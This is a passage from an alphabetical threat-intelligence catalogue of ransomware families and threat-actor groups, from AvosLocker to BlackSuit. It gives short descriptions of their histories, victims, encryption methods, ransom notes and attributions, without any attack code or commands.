In March 2022, the FBI and the U.S. Treasury Financial Crimes Enforcement Network released a joint advisory addressing AvosLocker and their activity targeting organizations across several critical infrastructure sectors. The RaaS gang deploys ransomware onto their victim’s networks and systems, then threatens to leak their files on the dark web if they don’t pay up. AvosLocker is both the name of the RaaS gang, as well as the name of the ransomware itself. In May 2022, AvosLocker took responsibility for attacking and stealing data from the Texas-based healthcare organization, CHRISTUS Health. CHRISTUS Health runs hundreds of healthcare facilities across Mexico, the U.S., and South America. The group stole information from a cancer patient registry which included names, social security numbers, diagnoses, dates of birth, and other medical information. The nonprofit Catholic health system has more than 600 healthcare facilities in Texas, Louisiana, New Mexico, and Arkansas. There are also facilities in Columbia, Mexico, and Chile. Fortunately, the ransomware attack was quickly identified and was limited. While other healthcare organizations have not been as fortunate with ransomware attacks, the AvosLocker attack didn’t impact CHRISTUS Health’s patient care or clinical operations. CHRISTUS Health didn’t reveal whether or not the security incident included ransomware, data exfiltration or extortion, but due to AvosLocker’s reputation, it is more than likely that the incident included at least one of the three.
Aw3s0m3Sc0t7
Ransomware
Awaken Likho
Awaken Likho is an APT group that has targeted Russian government agencies and industrial enterprises, employing techniques such as information gathering via search engines and using MeshCentral for remote access. The group has been active since at least December 2021 and has ramped up its activities following the Russo-Ukrainian conflict. Recent reports indicate that they are focusing on espionage against critical infrastructure in the defense and energy sectors. Analysis of their malware reveals a new version that is still in development, suggesting ongoing operational capabilities.
Aware
Aware is an active extortion or ransomware group tracked by RansomLook.
AxCrypter
Ransomware
axxes
Axxes ransomware emerged as a rebranded version of the previously known Midas ransomware group, with roots also tracing back through Haron and Avaddon lineage. It operates via a single-extortion model, encrypting files and appending the .axxes extension. Victims receive both an “RESTORE_FILES_INFO.hta” and a “.txt” ransom note. The ransomware performs extra actions like determining the device’s geolocation, modifying the Windows Firewall, changing file extensions, and terminating processes using taskkill.exe. Its known targets span the U.S., UAE, France, and China, including at least one high-profile victim—The H Dubai hotel. This group appears financially motivated, leveraging historical branding and code of earlier groups for its operations.
Ayyıldız Tim
Ayyıldız (Crescent and Star) Tim is a nationalist hacking group founded in 2002. It performs defacements and DDoS attacks against the websites of governments that it considers to be repressing Muslim minorities or engaged in Islamophobic policies.
aZaZeL
Ransomware
Aztroteam
Aztroteam is an active extortion or ransomware group tracked by RansomLook.
AzzaSec
AzzaSec is a hacktivist group that originated in Italy. Known for their pro-Palestine stance, they have been involved in various cyberattacks targeting Israel and pro-Israel countries. Additionally, AzzaSec has engaged in ransomware activities and has been known to collaborate with other cybercriminal groups.
B2DR Ransomware
uses the .reycarnasi1983@protonmail.com.gw3w amd a ransom note named ScrewYou.txt
Babax
ransomware
babuk-bjorka
On January 26th, Babuk's dedicated leak site (DLS) was "relaunched". Bjorka (Telegram: @bjorkanesiaaaa) is the current administrator. Upon launch, the DLS was populated mainly by victims previously claimed by other groups such as RansomHub, Lockbit3, and Funksec. At this current time there is no apparent connection to the original Babuk operation besides reusing the Babuk site template and logos. The groups is also known as Babuk2 by other trackers.
It is important to note that the original Babuk DLS was hosted and available up until February 26th, 2024.
Babuk-Locker
Babuk‑Locker emerged in early 2021 as a Ransomware‑as‑a‑Service (RaaS) gang targeting high‑value “big game” enterprises across sectors like healthcare, telecommunications, finance, education, and government. It initially deployed crypto-ransomware—encrypting files using ChaCha8 encryption with keys secured via elliptic‑curve Diffie‑Hellman—and later added a double‑extortion model involving data theft and leak site threats. Notable incidents include attacks on the Washington, D.C. Metropolitan Police Department and other organizations. In mid‑2021, Babuk’s source code was leaked, prompting both a fragmentation of its core operations and emergence of variants like Babuk Tortilla and Babuk V2. Affiliates exploited vulnerabilities in ESXi hypervisors to deliver destructive variants, and law enforcement actions eventually disrupted key operators.
Babuk Ransomsware
Since this is the first detection of this malware in the wild, it’s not surprising that Babuk is not obsfuscated at all. Overall, it’s a pretty standard ransomware that utilizes some of the new techniques we see such as multi-threading encryption as well as abusing the Windows Restart Manager similar to Conti and REvil. For encrypting scheme, Babuk uses its own implementation of SHA256 hashing, ChaCha8 encryption, and Elliptic-curve Diffie–Hellman (ECDH) key generation and exchange algorithm to protect its keys and encrypt files. Like many ransomware that came before, it also has the ability to spread its encryption through enumerating the available network resources.
Babyduck
Babyduck is an active extortion or ransomware group tracked by RansomLook.
babylockerkz
BabyLockerKZ is a variant of MedusaLocker ransomware, first observed in late 2023. It operates under a double‑extortion model, combining file encryption with data exfiltration and extortion. Technically, it reuses MedusaLocker’s AES + RSA‑2048 hybrid encryption, appends the .hazard file extension to encrypted files, and includes a unique autorun registry key (“BabyLockerKZ”) alongside dedicated public/private key data inserted into registry values. Initial access is achieved through opportunistic methods like RDP compromises, with lateral movement facilitated by compromised credentials and tools such as Mimikatz. The variant employs a custom toolkit codenamed paid_memes, which includes tools like "Checker" for scanning credentials, facilitating automation, and bridging toolsets for further exploitation. Starting late 2022, its operators have compromised over 100 organizations per month, initially targeting European victims before shifting toward Latin America in 2023.
backmydata
BackMyData is a variant of the Phobos ransomware family, first observed in early 2024. It follows a double‑extortion model: encrypting files and threatening data exposure. The ransomware primarily targets organizations via weak or misconfigured RDP access (e.g., remote desktop services), though phishing and initial-stage payloads like SmokeLoader have also been noted. Technical behavior includes AES‑256 file encryption, with keys secured via a public RSA‑2048 key embedded in the binary. Post-infection actions involve disabling firewalls, deleting volume shadow copies, inhibiting recovery functionality, and establishing persistence through registry Run keys and startup folder entries. Encrypted files receive the extension .BACKMYDATA, and victims are left with ransom notes (info.txt, info.hta, or .backmydata) that instruct them to contact attackers via email or Session Messenger. A significant incident involved a coordinated attack on Romania’s Hipocrate Information System (HIS), impacting 26 hospitals and causing widespread system outages across nearly 100 facilities, with ransom demands of approximately 3.5 BTC (~$175,000).
Bad Rabbit
On October 24, 2017, Cisco Talos was alerted to a widescale ransomware campaign affecting organizations across eastern Europe and Russia. As was the case in previous situations, we quickly mobilized to assess the situation and ensure that customers remain protected from this and other threats as they emerge across the threat landscape. There have been several large scale ransomware campaigns over the last several months. This appears to have some similarities to Nyetya in that it is also based on Petya ransomware. Major portions of the code appear to have been rewritten. The distribution does not appear to have the sophistication of the supply chain attacks we have seen recently.
Badbeeteam
ransomware
BadBlock
Ransomware
BadEncript Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
BadEncript
Ransomware
BadRory
Kaspersky researchers have identified a new APT group named BadRory that has mounted two waves of spear-phishing attacks against Russian organizations. The campaigns took place in October 2022 and April 2023 and leveraged boobytrapped Office emails. Targets included government entities, military contractors, universities, and hospitals.
Bahamut
Bahamut is a threat actor primarily operating in Middle East and Central Asia, suspected to be a private contractor to several state sponsored actors. They were observed conduct phishing as well as desktop and mobile malware campaigns.
BaksoCrypt
Ransomware Based on my-Little-Ransomware
Balbaz
Ransomware
Baliluware
Ransomware
Balletspistol
BalletsPistol is a Python-based ransomware strain distributed via GitHub. An investigative report from June 2025 reveals its delivery through a malicious ISO file hosted on a now‑removed public GitHub repository tinextacyber.com+1 . The infection chain begins when the ISO (named Invoice.iso) is downloaded and mounted, revealing a batch script (MAIN.BAT) and supporting components—including a password-protected ZIP and shortcut (.lnk) for execution. The malware performs privilege escalation (via UAC bypass using fodhelper.exe), persistence via registry and scheduled tasks, and then extracts an executable from the ZIP to commence the main payload. This binary encrypts user files with a hybrid AES + RSA scheme, adding the .iDCVObno extension to encrypted files; it also drops ransom notes (RESTORE-MY-FILES.TXT or .HTA) and changes the victim’s wallpaper.
Bam!
Ransomware
BAMBOO SPIDER
Crowdstrike tracks the developer of Panda Zeus as BAMBOO SPIDER
BananaCrypt
Ransomware
BancoCrypt HT
Ransomware
Bandarchor
Ransomware Files might be partially encrypted
Bangladesh Financial Intelligence Unit
Bangladesh Financial Intelligence Unit (BFIU)
BANISHED KITTEN
BANISHED KITTEN is an Iranian state-nexus adversary active since at least 2008. While the adversary’s most prominent activity is the July and September 2022 disruptive attacks targeting Albanian government infrastructure and the use of the HomelandJustice persona to leak stolen data, BANISHED KITTEN has likely targeted dissidents using the AllinOneNeo malware family.
Banks1
ransomware
Barack Obama's EBBV
Ransomware
Barack Obama's Everlasting Blue Blackmail Virus Ransomware
A new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a "tip" to decrypt the files.
BarRax Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear
Bart ransomware
Bart ransomware is distributed by the same Russian Cyber Mafia behind Dridex 220 and Locky. Bart doesn't communicate with a command and control (C&C) server, so it can encrypt files without being connected to a computer. Bart is spread to end users via phishing emails containing .zip attachments with JavaScript Code and use social engineering to trick users into opening the 'photo' attachments. The zipped files are obfuscated to make it more hard to tell what actions they are performing. See screenshot above for an example of what they look like. If opened, these attachments download and install the intermediary loader RockLoader which downloads Bart onto the machine over HTTPS. Once executed, it will first check the language on the infected computer. If the malware detects Russian, Belorussian, or Ukrainian, the ransomware will terminate and will not proceed with the infection. If it's any other language, it will start scanning the computer for certain file extensions to encrypt. Because Bart does not require communication with C&C infrastructure prior to encrypting files, Bart could possibly encrypt machines sitting behind corporate firewalls that would otherwise block such traffic. Thus, organizations need to ensure that Bart is blocked at the email gateway using rules that block zipped executables.
Bart
Ransomware Possible affiliations with RockLoader, Locky and Dridex
Basilisque Locker
Ransomware
BASS-FES
Ransomware
BatShadow
BatShadow is a Vietnamese threat actor that targets job seekers and digital marketing professionals through social engineering campaigns, deploying the Go-based malware known as Vampire Bot. The group impersonates recruiters and distributes malicious job descriptions and corporate PDFs, triggering a multi-stage infection chain that enables remote surveillance and data theft. Analysts have linked BatShadow to Vietnam based on infrastructure reuse and targeting patterns, noting its history of using domains like samsung-work.com to distribute various malware families, including Agent Tesla and Quasar RAT. The actor employs techniques such as filename tricks and coercive browser actions to evade detection and increase the likelihood of successful compromises.
Bavacai
Bavacai is an active extortion or ransomware group tracked by RansomLook.
BazarCall
BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are being cold called by the attacker, except in BazarCall’s case, targeted users must dial the number. And when they do, the users are connected with actual humans on the other end of the line, who then provide step-by-step instructions for installing malware into their devices.
BB
Ransomware
Bearlyfy
Bearlyfy has been attributed to over 70 cyber attacks targeting Russian companies since its emergence in January 2025, employing a custom Windows ransomware strain known as GenieLocker. The group operates with dual objectives of extortion and sabotage, utilizing a modified version of PolyVice and leveraging vulnerabilities in external services and applications for initial access. Analysis reveals overlaps with PhantomCore, indicating a pro-Ukrainian interest, while Bearlyfy's attacks are characterized by minimal preparation and a focus on immediate impact through data encryption and destruction. Approximately 20% of victims reportedly pay the ransom, with demands escalating to hundreds of thousands of dollars.
Beast
Beast ransomware emerged in 2022 as an enhanced iteration of the earlier “Monster” ransomware. It operates under a Ransomware-as-a-Service (RaaS) model, offering affiliates rich customization options to create tailored binaries targeting Windows, Linux, and VMware ESXi systems. Key technical capabilities include hybrid Elliptic-Curve + ChaCha20 encryption, segmented file encryption, ZIP wrapper mode (encrypting files into zip archives with embedded ransom notes), multithreaded processing, termination of services, shadow copy deletion, hidden partition usage, and subnet scanning. Affiliates are provided configurable offline builders, enabling streamlined deployment across multiple platforms. While Beast's functional power is well-documented, details on its specific victims, sectors targeted, and leak site activity remain limited in public sources.
BeethoveN
Ransomware
Beijing Group
Beijing Group is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Belgian General Information and Security Service
ADIV / SGRS (ADIV/SGRS) (General Intelligence and Security Service, military intelligence)
Belgian State Security Service
VSSE (State Security Service)
BelialDemon
Mentioned as operator of TriumphLoader and Matanbuchus
Belsen Group
The Belsen Group has exploited the CVE-2022-40684 vulnerability in Fortinet devices to compromise over 15,000 FortiGate firewalls, releasing detailed configurations and plaintext VPN credentials. Their leaked data, organized by country and IP address, primarily consists of configurations from FortiOS 7.0.6 and 7.2.1, which were the last vulnerable versions before patches were issued. Security researcher Kevin Beaumont confirmed that the group leveraged this vulnerability to gain unauthorized access and warned of potential exploitation of CVE-2024-55591 by similar threat actors. Fortinet has stated that the leaked data originates from older campaigns and not from any recent incidents.
Benzona
Benzona is an active extortion or ransomware group tracked by RansomLook.
Berry Sandstorm
Microsoft threat actor profile. Origin/Threat: Iran.
bert
BERT ransomware (also tracked as Water Pombero) first emerged in April 2025, rapidly targeting both Windows and Linux systems across Asia, Europe, and the U.S., with confirmed victims in healthcare, technology, electronics, and event services sectors. Its Windows variant employs a PowerShell-based loader that escalates privileges, disables Defender, UAC, and the firewall, then downloads the ransomware payload. The Linux version aggressively encrypts with up to 50 concurrent threads, forcibly shuts down VMware ESXi VMs to prevent recovery, and appends extensions like .encryptedbybert or .encrypted_by_bert. BERT uses AES encryption, and later variants feature optimized multithreading via ConcurrentQueue and DiskWorker threads. Analysts note code similarities with REvil and Babuk ESXi lockers, potentially pointing to shared development lineage or code reuse.
Best Crypt
ransomware
BestChangeRu
Ransomware
BianLian Ransomware Group
BianLian is an extortion-focused threat actor group. The group originally used double-extortion methods when it began its operations in June 2022, demanding payment in exchange for decrypting locked files while also threatening to leak exfiltrated data. U.S. & Australian cybersecurity officials observed BianLian actors shifting almost exclusively to exfiltration-focused extortion schemes in 2023.[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)] **Related Vulnerabilities**: CVE-2020-1472[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)], CVE-2021-34473[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)], CVE-2021-34523[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)], CVE-2021-31207[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)] **PulseDive (IOCs)**: https://pulsedive.com/threat/BianLian
Bianlian
BianLian used subtle techniques to exploit, enumerate, and move laterally in victim networks to remain undetected and aggressively worked to counter Endpoint Detection & Response (EDR) protections during the encryption phase of their operations. The group has displayed signs of being new to the practical business aspects of ransomware and associated logistics. Generally they seemed to be experiencing the growing pains of a group of talented hackers new to this aspect of criminal extortion. Infrastructure associated with the BianLian group first appeared online in December 2021 and their toolset appears to have been under active development since then. Finally, we have observed the BianLian threat actor tripling their known command and control (C2) infrastructure in the month of August, suggesting a possible increase in the actor’s operational tempo.
BiBiGun
A pro-Hamas hacktivist group developed a wiper called BiBi-Linux to target and destroy data on Israeli systems. The malware impersonates ransomware but operates solely to corrupt and delete files, indicating no data theft. A Windows variant, BiBi-Windows, was also discovered, sharing similarities with BiBi-Linux but targeting all files except executables. ESET researchers have named the group behind the wipers BiBiGun. The group's TTPs have shown overlaps with Moses Staff, which is believed to have an Iran nexus.
bidon
BIDON is a variant of the Monti ransomware family, first observed around mid‑2023. It employs a double‑extortion strategy—encrypting victims’ files and simultaneously threatening to leak stolen data if the ransom isn’t paid. Notably, it appends the .PUUUK extension to encrypted files and drops a readme.txt ransom note outlining the extortion demands. The note offers a free decryption of two files as proof of capability and emphasizes that only authorized company personnel (e.g., top management) should engage. BIDON specifically targets corporate and enterprise organizations, not home users, and warns victims not to involve law enforcement or third-party recovery firms. It represents a shift toward more aggressive extortion tactics within the Monti lineage.
BIG PANDA
BIG PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
BigBobRoss
BigBobRoss ransomware is the cryptovirus that requires a ransom in Bitcoin to return encrypted files marked with .obfuscated appendix.
BigBossHorse
Ransomware
Biglock
ransomware
Bignosa
Bignosa is a threat actor known for launching malware campaigns targeting Australian and US organizations using phishing emails with disguised Agent Tesla attachments protected by Cassandra Protector. They compromised servers by installing Plesk and RoundCube, connected via SSH and RDP, and used advanced obfuscation methods to evade detection. Bignosa collaborated with another cybercriminal named Gods, who provided advice and assistance in their malicious activities. The actor has been linked to multiple phishing attacks and malware distribution campaigns, showcasing a high level of sophistication in their operations.
Birbware
Ransomware
BitCrypt 2.0
Ransomware
BitCrypt
Ransomware
BitCryptor
Ransomware Has a GUI. CryptoGraphic Locker family. Newer CoinVault variant.
BitKangoroo
Ransomware
BitPaymer
In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.
BitPyLock
Ransomware
BitRansomware
ransomware
Bitshifter
Ransomware
BitStak
Ransomware
BITWISE SPIDER
BITWISE SPIDER has recently and quickly become a significant player in the big game hunting (BGH) landscape. Their dedicated leak site (DLS) has received the highest number of victims posted each month since July 2021 compared to other adversary DLSs due to the growing popularity and effectiveness of LockBit 2.0.
BizHack
ransomware
Bjorka
Bjorka is an underground actor persona that has claimed attacks on victims in a wide range of sectors and geographies. Researchers assess that the Bjorka persona is likely the administrator of a "data leak site" discovered in January 2025, which operates under the moniker "Babuk 2", ostensibly in reference to the Babuk ransomware that was highly active in the early 2020's. Researchers also assessed that much of the alleged victim data published on the site was likely recycled from previous information leaks.[[Cyjax Bjorka January 29 2025](/references/1d775a36-8b15-49f8-8c08-f92101e6d1be)]
BKRansomware
Ransomware
Bl00dy Ransomware Gang
Bl00dy self-identifies as a ransomware group. It gained attention in May 2023 for a series of data exfiltration and encryption attacks against education entities in the United States that featured exploit of vulnerabilities in PaperCut print management software, which is prevalent in the sector.[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)] **Related Vulnerabilities**: CVE-2023-27350[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]
Black Basta Affiliates
This Group object reflects the tools & TTPs associated with threat actors known to deploy Black Basta, a ransomware-as-a-service (RaaS) variant that researchers believe has been used since at least April 2022. Black Basta affiliates have attacked a very wide range of targets, including organizations in at least 12 out of 16 U.S. critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.[[U.S. CISA Black Basta May 10 2024](/references/10fed6c7-4d73-49cd-9170-3f67d06365ca)] Specific pre- and post-exploit behaviors may vary among intrusions carried out by different Black Basta affiliates. TTPs associated with the Black Basta ransomware binary itself can be found in the separate dedicated Software object.
Black claw
ransomware
Black Feather
Ransomware
black nevas
BlackNevas ransomware — also referred to as “Trial Recovery” — was first observed in November 2024. It is a direct derivative of the Trigona ransomware family and continues the lineage's focus on extortion over public shaming. BlackNevas operators support a double-extortion model, encrypting files using AES-256 with RSA-4112-protected keys, and appending the .-encrypted or .ENCRYPTED file extension to affected files. Hybrid payloads are available for Windows, Linux, NAS, and VMware ESXi platforms.
While BlackNevas does not host its own data leak site, it reportedly collaborates with other ransomware groups for data publication — known partners include Kill Security, Hunters International, DragonForce, Blackout, Embargo Team, and Mad Liberator. The group has predominantly targeted large enterprises in sectors such as finance, telecommunications, manufacturing, healthcare, and legal. Initial access is commonly achieved via phishing or exploitation of vulnerabilities, with lateral movement facilitated through SMB enumeration and optional LAN-wide propagation.
Black Ruby
A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file name, and then append the BlackRuby extension. To make matters worse, Black Ruby will also install a Monero miner on the computer that utilizes as much of the CPU as it can. Discovered on February 6, 2018. May have been distributed through unknown vectors. Will not encrypt a machine if its IP address is identified as coming from Iran; this feature enables actors to avoid a particular Iranian cybercrime law that prohibits Iran-based actors from attacking Iranian victims. Encrypts files on the infected machine, scrambles files, and appends the .BlackRuby extension to them. Installs a Monero miner on the infected computer that utilizes the machine’s maximum CPU power. Delivers a ransom note in English asking for US$650 in Bitcoins. Might be installed via Remote Desktop Services.
black suit
BlackSuit is a type of malicious software classified as ransomware. Its operation involves multifaceted extortion, encrypting and exfiltrating victim data, and hosting public data leak sites for victims who fail to meet its demands. BlackSuit’s activities first began in early May 2023. Designed to prevent access to files by encrypting them, this ransomware appends the “.blacksuit” extension to the names of all affected files. Furthermore, it changes the desktop wallpaper and creates a ransom note file named “README.BlackSuit.txt.” This threat actor targets large corporations, small and medium-sized enterprises (SMEs), with no apparent specific discrimination regarding industry or type of victim.
Black Witch
Black Witch is an active extortion or ransomware group tracked by RansomLook.
Blackatom
Recent campaigns suggest Hamas-linked actors may be advancing their TTPs to include intricate social engineering lures specially crafted to appeal to a niche group of high value targets. In September 2023, a Palestine-based group likely linked to Hamas targeted Israeli software engineers using an elaborate social engineering ruse that ultimately installed malware and stole cookies. The attackers, which Google’s Threat Analysis Group (TAG) tracks as BLACKATOM, posed as employees of legitimate companies and reached out via LinkedIn to invite targets to apply for software development freelance opportunities. Targets included software engineers in the Israeli military, as well as Israel’s aerospace and defense industry
BlackBasta
Black Basta is a new ransomware strain discovered during April 2022 - looks in dev since at least early February 2022 - and due to their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along their affiliates.
blackberserk
Black Berserk is a relatively unsophisticated ransomware strain analyzed in late 2023. It operates under a single‑extortion model—encrypting files and demanding payment, with no documented abilities or threats for data exfiltration or public leaks. In observed cases, the malware appends the .Black extension to encrypted files (e.g., 1.jpg.Black) and leaves a ransom note titled Black_Recover.txt, which urges victims to make contact to negotiate payment or test decryption with benign files. The infection method appears opportunistic, delivered via isolated incidents or broad malware distribution—not linked to targeted campaigns or infrastructure. There is no evidence of it functioning as a RaaS operation or targeting any specific victim profiles or sectors.
blackbit
BlackBit ransomware was first observed in August 2022 and is a .NET-based strain that closely mimics the design and functionality of LockBit 3.0, indicating either a fork of LockBit’s leaked builder or deliberate imitation. It uses a double-extortion model, encrypting victim files and threatening to leak stolen data via a Tor-based site. BlackBit employs AES symmetric encryption for file contents and RSA asymmetric encryption for key protection, appending the .BlackBit extension to affected files. The malware also includes features for terminating processes, deleting volume shadow copies, and disabling recovery mechanisms. Initial access vectors are not comprehensively documented but are consistent with phishing, exploitation of vulnerable public-facing services, and the use of compromised credentials. Victims have been identified across various sectors, including technology, manufacturing, and professional services, though its activity level has been far lower than LockBit’s.
Blackbyte Crux
Crux is a newly identified ransomware variant active since July 2025, which claims affiliation with the established BlackByte ransomware group. It implements a double‑extortion model—encrypting files (with the .crux extension) and threatening data leak via a Tor-based portal. A distinctive feature of Crux is its execution flow: it initiates via svchost.exe, cmd.exe, and bcdedit.exe to disable Windows recovery, followed by rapid file encryption. The ransomware has been confirmed in at least three incidents across sectors including agriculture, education, professional services, media, and nonprofits, in both the U.S. and U.K. Ransom notes consistently follow the naming pattern crux_readme_[random].txt.
BlackCat Ransomware Actors & Affiliates
This object represents the BlackCat/ALPHV Ransomware-as-a-Service (“RaaS”) apex group and the behaviors associated with its various affiliate ransomware operators. Specific affiliate operations defined by the research community will be tracked as separate objects. Researchers first observed BlackCat ransomware (AKA ALPHV or Noberus) in November 2021. An April 2022 U.S. FBI advisory linked BlackCat’s developers and money launderers to the defunct Blackmatter and Darkside ransomware operations (the latter was responsible for the major 2021 Colonial Pipeline incident).[[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)] As of September 2023, BlackCat is believed to be responsible for attacking organizations globally and in virtually every major sector, and it consistently claims some of the highest victim tallies of any RaaS. According to data collected by the [ransomwatch project](https://github.com/joshhighet/ransomwatch) and analyzed by Tidal, BlackCat actors publicly claimed 233 victims in 2022, the third most of any ransomware operation in the dataset (considerably below Clop (558) but well above Hive (181)), and it already surpassed that number by July of 2023.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] Like many RaaS, BlackCat actors threaten to leak exfiltrated victim data, but they also threaten to carry out denial of service attacks if victims do not pay timely ransoms.[[BlackBerry BlackCat Threat Overview](/references/59f98ae1-c62d-460f-8d2a-9ae287b59953)] BlackCat developers have regularly evolved the namesake ransomware over time, and collaboration with affiliates means that a large number and variety of tools & TTPs are observed during intrusions involving BlackCat. BlackCat became the first prominent ransomware family to transition to the Rust programming language in 2022, which researchers assess provides greater customization and defense evasion capabilities and faster performance.[[X-Force BlackCat May 30 2023](/references/b80c1f70-9d05-4f4b-bdc2-6157c6837202)][[FBI BlackCat April 19 2022](/references/2640b58c-8413-4691-80e1-33aec9b6c7f6)] A BlackCat variant named Sphynx emerged in early 2023, featuring multiple defense evasion-focused enhancements. In Q3 2023, public reports suggested that Scattered Spider (AKA 0ktapus or UNC3944), a group attributed to several prominent intrusions involving telecommunications, technology, and casino entities, had begun to use BlackCat/Sphynx ransomware during its operations.[[Caesars Scattered Spider September 13 2023](/references/6915c003-7c8b-451c-8fb1-3541f00c14fb)][[BushidoToken Scattered Spider August 16 2023](/references/621a8320-0e3c-444f-b82a-7fd4fdf9fb67)]
BlackCat
BlackCat (ALPHV) is ransomware written in Rust. The ransomware makes heavy use of plaintext JSON configuration files to specify the ransomware functionality. BlackCat has many advanced capabilities like escalating privileges and bypassing UAC make use of AES and ChaCha20 or Salsa encryption, may use the Restart Manager, can delete volume shadow copies, can enumerate disk volumes and network shares automatically, and may kill specific processes and services. The ransomware exists for both Windows, Linux, and ESXi systems. Multiple extortion techniques are used by the BlackCat gang, such as exfiltrating victim data before the ransomware deployment, threats to release data if the ransomw is not paid, and distributed denial-of-service (DDoS) attacks.
Blackfield
Blackfield is an active extortion or ransomware group tracked by RansomLook.
BlackFireEye
Ransomware
Blackgear
BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts. Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. Two things led us to this conclusion: first, the fake documents that are used as part of its infection routines are now in Japanese. Secondly, it is now using blogging sites and microblogging services based in Japan for its C&C activity.
BlackHat-Mehtihack
Ransomware
Blackhunt
Black Hunt ransomware has been active since at least mid-2021 and operates under a double-extortion model, encrypting victim files and threatening public release of stolen data via a Tor-based leak site. It primarily targets organizations rather than individuals, with confirmed attacks in sectors including manufacturing, retail, technology, and local government. Encrypted files are appended with the .BlackHunt extension, and ransom notes (Restore_Data.txt) direct victims to Tor portals for negotiation. The ransomware is capable of terminating processes, deleting shadow copies, and disabling recovery functions to maximize impact. Initial access methods include exploitation of vulnerable RDP services and the use of compromised credentials from initial access brokers. While its activity level is smaller compared to major RaaS families, its leak site has featured victims from multiple countries, suggesting an international reach.
BlackJack
Blackjack, a threat actor linked to Ukraine's security apparatus, has targeted critical Russian entities such as ISPs, utilities, and military infrastructure. They have claimed responsibility for launching cyberattacks resulting in substantial damage and data exfiltration. The group allegedly used the Fuxnet malware to target sensor gateways connected to internet-connected sensors, impacting infrastructure monitoring systems. Blackjack has also been involved in attacks against companies like Moscollector, causing disruptions and stealing sensitive data.
BlackKingdom
Ransomware
BlackLock Ransomware Operators
Security researchers have described BlackLock as a "rebranding" of the Eldorado ransomware operation.[[Resecurity BlackLock March 25 2025](/references/2977c45f-3a7a-42ae-be59-378aa288dc24)] Unless otherwise noted, this object uses details from the existing "Eldorado Ransomware Operators" Group object.
Blackmeta
BLACKMETA is a pro-Palestinian hacktivist group that has claimed responsibility for a series of DDoS attacks and data breaches targeting organizations perceived as supportive of Israel, including the Internet Archive and various entities in the UAE and Saudi Arabia. The group employs DDoS attacks, website defacement, and data exfiltration, with motivations rooted in political ideology and retribution for perceived injustices against Palestinians. Their operations have been linked to a Telegram channel, where they publicize their activities and collaborate with other hacktivist groups. Additionally, they have been attributed to significant cyber disruptions, including a 100-hour DDoS campaign against a UAE bank, showcasing their operational capabilities.
BlackMist
Ransomware
BlackMoon
ransomware
Blackout
Ransomware
BlackPink
Ransomware
BlackRose
Ransomware
BlackShades Crypter
Ransomware
BlackSheep
Ransomware
blackshrantac
aka black shrantac
blacksnake
BlackSnake is a Ransomware-as-a-Service (RaaS) operation that first appeared in August 2022, when its operators began recruiting affiliates on underground forums with an unusually low revenue share of 15%. It primarily targets home users rather than large enterprises and does not maintain a public leak site. Built on the Chaos ransomware code base, it features both file encryption and a cryptocurrency clipper module to steal funds from victims. The ransomware is developed in .NET and includes safeguards to avoid execution in Turkish or Azerbaijani environments, suggesting geographic targeting preferences. Infections result in encrypted files and ransom notes instructing victims to make contact via email for payment negotiations. The group’s operational scale and visibility remain limited compared to major RaaS families.
BlackSuit Ransomware Actors
This object reflects the ATT&CK Techniques associated with threat actors who deploy BlackSuit, a ransomware capable of running on Windows and Linux systems. BlackSuit is believed to be a successor to Royal, a ransomware operation which itself derives from the notorious Russia-based Conti gang. BlackSuit operations were first observed in May 2023, and although they were relatively low in number, U.S. authorities issued a warning for healthcare sector organizations due to the ransomware's suspected pedigree.[[HC3 Analyst Note BlackSuit Ransomware November 2023](/references/d956f0c6-d90e-49e8-a64c-a46bfc177cc6)] The number of attacks claimed by BlackSuit operators increased notably in Q2 2024.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)] ATT&CK Techniques associated with the BlackSuit ransomware binary are tracked in a separate "BlackSuit Ransomware" Software object.
Blacktail
